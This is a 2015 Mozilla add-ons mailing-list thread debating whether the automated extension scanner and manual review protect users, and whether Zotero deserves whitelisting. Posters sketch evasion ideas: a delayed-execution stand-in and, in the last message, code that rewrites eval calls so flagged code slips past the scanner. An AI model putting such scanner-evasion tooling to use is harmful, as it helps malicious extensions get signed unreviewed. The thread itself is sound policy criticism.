> the tech is proprietary, so that's been slow.)
>
>
> Runtime analysis...which has no bearing on a discussion about an
> automated scanner and manual review?
>
>
> The goal was to integrate directly with their tech via a web service.
> In more or less real time.
>
> And yes, in the magical future world where automated scanning
> catches bad actors a whitelisted add-on would be an attractive
> target. I don't think that's a bad assumption.
>
>
> I'm sorry, are you now saying that for the last three months
> you've been arguing not about the scanning system that everyone
> else is talking about but a magical future system that can catch
> someone who doesn't want to be manually reviewed, which no one
> else weighing in on my post, including other Mozilla engineers,
> seems to think is possible?
>
>
> Yes, I've been operating for the last year or so under the assumption
> that any meaningful automated scanning in the long term would require
> tech that isn't static analysis.

OK, well, then this was indeed a misunderstanding. No one else has been
discussing that. We've been discussing the system Mozilla announced and
implemented, which involves an automated scanner and manual review for
extensions that fail it. Runtime limits are obviously the only way to
stop bad JS, and we're getting that with WebExtensions, but that's a
totally separate discussion. A discussion about whitelisting in the
context of WebExtensions (or runtime XPCOM interface restrictions, or
anything else) would take into account, among other things, the
capabilities requested in the extension manifest and the degree to which
those were presented to and agreed upon by the user. That is not the
current discussion.
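
(For illustration only, this is the kind of up-front declaration I
mean. It's a made-up WebExtensions-style manifest fragment, written
here as the equivalent JS object rather than raw manifest.json, and
it is not Zotero's or anyone else's actual manifest:)

    // Capabilities are declared ahead of time and can be shown to the user,
    // rather than inferred by scanning arbitrary chrome code.
    var manifest = {
      manifest_version: 2,
      name: 'example-extension',       // hypothetical name
      version: '1.0',
      permissions: [
        'storage',
        'tabs',
        'http://localhost/*'           // host access must be requested explicitly
      ]
    };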

> Yes, it is not capable of combating malware by anyone who 1) has
> the slightest bit of JS knowledge and 2) does not want to be detected.
>
>
> Signing, as you note repeatedly, gives us real tools to combat
> malware, especially side-loaded malware. It's important that we
> distinguish the two. However, you don't just attack the scanner,
> you're attacking the entire system. [1]

I'm not even sure what you're arguing at this point. I explicitly make
that distinction in the post. You know exactly what I'm attacking: an
automated scanner that provably cannot stop even trivial attempts at
malware but that will leave legitimate developers permanently in manual
review, and a strident opposition to whitelisting based on false claims
about what that scanner can do.

> In point 2 I suggest alterations that could be made to the new
> plan to both meaningfully increase user safety and avoid the
> serious drawbacks of the current plan in light of its sheer
> ineffectiveness.
>
>
> The roadblock of an initial review is smart, but potentially wouldn't
> scale well.

Fortunately, by dropping manual review based on pointless checks (which
Jorge now acknowledges is being "reconsidered"), reviewers will have
more time to scan initial submissions.

> ignoring the fact that Zotero has in effect been whitelisted
> for the last decade without that happening.
>
>
> "It hasn't happened before, so it won't happen in the future."

Not my argument. Jorge suggested code not reviewed by AMO inherently
goes bad in relatively short order. It didn't happen for Zotero in 10
years. That matters when evaluating risk.

> The issue isn't that you've suggested these as possibilities.
>
>
> That's really not true, IMO. You've reacted aggressively and
> dismissively to any statement that suggests we can't simply assume
> Zotero will never go bad. It could happen. Will it happen? Almost
> certainly not. But it'd be naive to not ensure the general policy has
> a remediation step if that unlikely event happens.

I've never claimed that nothing bad could ever happen with Zotero. I
have on some occasions pointed out the absurd steps that would need to
occur for some of those things to happen, compared to the far more
likely things that might occur with other extensions [1]. Strangely,
nobody responded to that one — which, incidentally, was the reason I
wrote this post.

I'm also the one who suggested remediation steps for the whitelist
proposal [2]. No one from Mozilla responded to those either.

> Again, and I keep saying this: I'm not worried about Zotero in
> particular, I just don't want Zotero's example to be the justification
> for a poorly conceived policy. (Or worse, an arbitrary set of
> exceptions.) I don't think that's an unfair position.

There's a finite number of times you can say that your concern is a
"poorly conceived policy" without making any tangible steps towards
forward progress before people might start to think you're not that
concerned about forward progress. As far as I can recall, you didn't
once respond to Gijs's actual proposed rules.

Again, if you and Jorge had approached this conversation by recognizing
months ago that Zotero should be whitelisted under any reasonable scheme
and that we just needed to work together to figure out the details,
things probably wouldn't have gotten to this very public point. Instead,
Jorge last week: "The issues with Zotero have been discussed many times
over already, and we currently don't have neither the capability nor the
intention of whitelisting add-ons."

Fortunately it's become clear in the last few days that other people
within Mozilla recognize that an extension like Zotero provides value
that should be protected, so it doesn't really matter to me that you
don't. And it's all irrelevant anyway, at least for now, because I've
demonstrated that forcing extensions into manual review based on
automated security checks makes no sense. When there's a different
reality to discuss, we can do so.

- Dan

[1]
https://groups.google.com/d/msg/mozilla.addons.user-experience/vxpElfVe_uo/WCGFFqvABgAJ
[2]
https://groups.google.com/d/msg/mozilla.addons.user-experience/3bAaITHf1Xo/ulnmgVeaAwAJ

Emiliano Heyns

Nov 27, 2015, 4:22:28 AM
to mozilla-addons-...@lists.mozilla.org
On Thursday, November 26, 2015 at 8:16:27 PM UTC+1, Mike Connor wrote:

> >> (We've had some interesting conversations with a potential partner who's
> >> already doing runtime analysis of add-ons, but the tech is proprietary, so
> >> that's been slow.)

My personal take is that the main reason the likes of HP Fortify, Checkmarx, Veracode (because I'd venture to guess it's one of these three we're talking about, and if I had to bet I would pick Checkmarx) use the "proprietary" label is that they too know you can't solve the halting problem. "Proprietary" sounds much better, marketing-wise, than snake oil. If it were more than that, you could bet your ass *someone* would have set Slashdot alight after picking up that Turing Award or Schock Prize.

> > Runtime analysis...which has no bearing on a discussion about an automated
> > scanner and manual review?
>
>
> The goal was to integrate directly with their tech via a web service. In
> more or less real time.

Real time. For the halting problem. That is funny.

> > I'm sorry, are you now saying that for the last three months you've been
> > arguing not about the scanning system that everyone else is talking about
> > but a magical future system that can catch someone who doesn't want to be
> > manually reviewed, which no one else weighing in on my post, including
> > other Mozilla engineers, seems to think is possible?
>
>
> Yes, I've been operating for the last year or so under the assumption that
> any meaningful automated scanning in the long term would require tech that
> isn't static analysis.
>
> (I have an unfortunate tendency toward assuming shared/equal context, and
> glossing over the details. Especially on things I've known for a long
> time. Aspie brain sucks.)

That it does (waves back), but an Aspie brain should also make you favor logical thinking over magical thinking, and evidence over confidence. I can see why you'd make the claims you have if you were in fact operating under the stated assumption, but as an Aspie myself, I have no idea how you came to that assumption. There is zero indication that any progress has been made towards solving the halting problem, and that lack of progress is neatly explained by the fact that solving it involves resolving a logical paradox. So unless this proprietary partner has devised something that can compute its way out of a logical paradox, here are the options I can think of that they might offer:

1. Static analysis, with, most likely, a larger base of samples (not patterns). But that won't help you much, because that stockpile of samples will be focused on web threats like XSS, not the kind of things JS can do in the rather unique Firefox chrome environment. As a matter of fact, the Mozilla scanner is likely to be ahead on this.

2. Runtime analysis as an attempt to brute-force their way through the halting problem, probably again meant to find known-bad behavior given typical input. But Dan's PoC doesn't react to typical input, only to very specific input, and it could easily escape behavior detection by only kicking in an hour after startup (see the sketch below). A user is likely to have the browser running for more than an hour, but it's unlikely the test will be allowed to run for that amount of time.
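
(The delay trick from point 2, as a minimal sketch; the timing and the payload stand-in are of course made up:)

    // Nothing observable happens until long after any plausible sandboxed
    // test run has finished; the payload below is a harmless stand-in.
    var ONE_HOUR = 60 * 60 * 1000;
    setTimeout(function () {
      // a real payload would go here
      console.log('woke up an hour after startup');
    }, ONE_HOUR);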

If this assessment is mistaken I'd *love* to know who this partner is so I can gear my analysis towards their specific product. If this partner isn't willing to disclose name or method, I'd have zero trust in them.

> Signing, as you note repeatedly, gives us real tools to combat malware,
> especially side-loaded malware. It's important that we distinguish the
> two. However, you don't just attack the scanner, you're attacking the
> entire system. [1]

That is because the scanner in fact breaks the entire system. The system as a whole is premised on the idea that code is vetted before release; the scanner does triage to see which extensions are innocent enough to be signed without any intervention, and which require manual review. But since the scanner can trivially be made to think that an extension is innocent even when an extension plainly advertises in code & documentation that it is malicious, no extension, regardless of intent, will ever pass through manual review unless it volunteers to do so.

This is much like claiming your home security system is safe because no one you're familiar with knows that you keep the alarm code on a post-it on the garage door... except that anyone attempting entry is nicely told "you can't enter unless you enter the PIN code that's pinned to the garage door" (all the while not alerting anyone to those attempts). This is exacerbated by the fact that extension IDs and user accounts are free and easy to create.

I think I hear Dan agreeing that signing will have benefits. In principle, code vetting would *also* have benefits, except:

1. If you're a legit dev, they're a pain, because they're slow. In a normal development process, you could plan ahead to reserve resources for such vetting, and the vetters would inspect the code as it is checked in to do incremental checks. This way, when release time is near, very little code vetting (if any) remains, and the process proceeds unhampered. The Mozilla review process doesn't allow for any of this. You can only submit your code as a whole, and there is absolutely no way to know when you'll be scheduled for a review, or how long it will take, except that precedent says "in 7 weeks, on average" and "depends on who's doing the review". You have zero insight into when reviewers take holidays, what their rotation schedule is, you name it. I never thought I'd see the day when a bureaucratic release process would seem a vast improvement in release times.

2. If you're a malicious dev, you can opt out by tweaking your extension in trivial ways to get signed automatically, and you forego the whole problem. Hell, a conscientious dev might choose to go this route to release an emergency fix.

The reason a legit dev would not choose option 2 is because getting your extension ID or AMO account banned would be a huge nuisance. But someone with ill intent could very easily just pick option 2. If they're caught, the fact that it is now known that they evade code vetting by gaming the scanner is not their problem -- the fact that they're outed as a malicious agent is, and the risk of being found out that way is bigger with option 1 than with option 2.

So pretty much by design, you're only going to catch the people who have good intent but (perhaps) lesser software development skills. It's a stretch to say that Zotero fits that category, and their past few reviews bear that out.

> The roadblock of an initial review is smart, but potentially wouldn't scale
> well.

Then how is perpetual review going to scale?

> That's really not true, IMO. You've reacted aggressively and dismissively
> to any statement that suggests we can't simply assume Zotero will never go
> bad.

A judge making you go through an extensive security scan every day you try to enter your office, because he deems it plausible you *might* at some point go rogue, would irk most people I know. It certainly doesn't help that in the next line over, people no one has seen before, carrying jerrycans and banners proclaiming "I'm going to rob the place and burn it down!", are waved through with a smile.

> It could happen. Will it happen? Almost certainly not. But it'd be
> naive to not ensure the general policy has a remediation step if that
> unlikely event happens.

No one has asked for a system without remediation steps. The remediation steps are already present (blocking, or rejecting whitelist status) and no one is arguing those should not be there. Dan has in fact stated that these remediation features are viable benefits of signing extensions.

> Again, and I keep saying this: I'm not worried about Zotero in particular,
> I just don't want Zotero's example to be the justification for a poorly
> conceived policy. (Or worse, an arbitrary set of exceptions.) I don't
> think that's an unfair position.

But there *already is* a poorly conceived policy *and* an arbitrary set of exceptions. The scanner triage makes sure of that. I agree that if auto-signing did not exist, Dan's argument wouldn't work. But it does exist. Which means people can arbitrarily choose to have anything signed if they don't care about the reputation attached to an unvetted email address ("watch out people, whoever has access to m8r-m...@mailinator.com should not be trusted!") should they get caught, with the risk of being caught no greater than it ever was.

Emiliano Heyns

Nov 29, 2015, 7:21:23 AM
to mozilla-addons-...@lists.mozilla.org
BTW, there is also the fun fact that it would be simple to combine the scanner with a modified version of an existing JavaScript beautifier (the scanner walks the AST and marks problem spots; the beautifier walks the AST and regenerates JavaScript source) to go over an extension and fully automatically rewrite the problem spots, using variants of Dan's samples, into a tool that makes sure your extension passes for automated signing. Not a few minutes' work, but not actually hard to do.
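
A minimal sketch of the idea, assuming the usual esprima/estraverse/escodegen toolchain; the single rewrite rule shown here (splitting a literal eval call into a concatenated property lookup, as in Dan's sample) is just one illustrative transform, not a complete laundering tool:

    // Walk the AST, rewrite constructs a scanner would flag, regenerate source.
    var esprima = require('esprima');
    var estraverse = require('estraverse');
    var escodegen = require('escodegen');

    function launder(source) {
      var ast = esprima.parse(source);
      estraverse.replace(ast, {
        enter: function (node) {
          // rewrite eval(x) -> window['ev' + 'al'](x)
          if (node.type === 'CallExpression' &&
              node.callee.type === 'Identifier' &&
              node.callee.name === 'eval') {
            node.callee = {
              type: 'MemberExpression',
              computed: true,
              object: { type: 'Identifier', name: 'window' },
              property: {
                type: 'BinaryExpression',
                operator: '+',
                left: { type: 'Literal', value: 'ev' },
                right: { type: 'Literal', value: 'al' }
              }
            };
          }
          return node;
        }
      });
      return escodegen.generate(ast);
    }

    console.log(launder("eval('1 + 1');"));
    // -> window['ev' + 'al']('1 + 1');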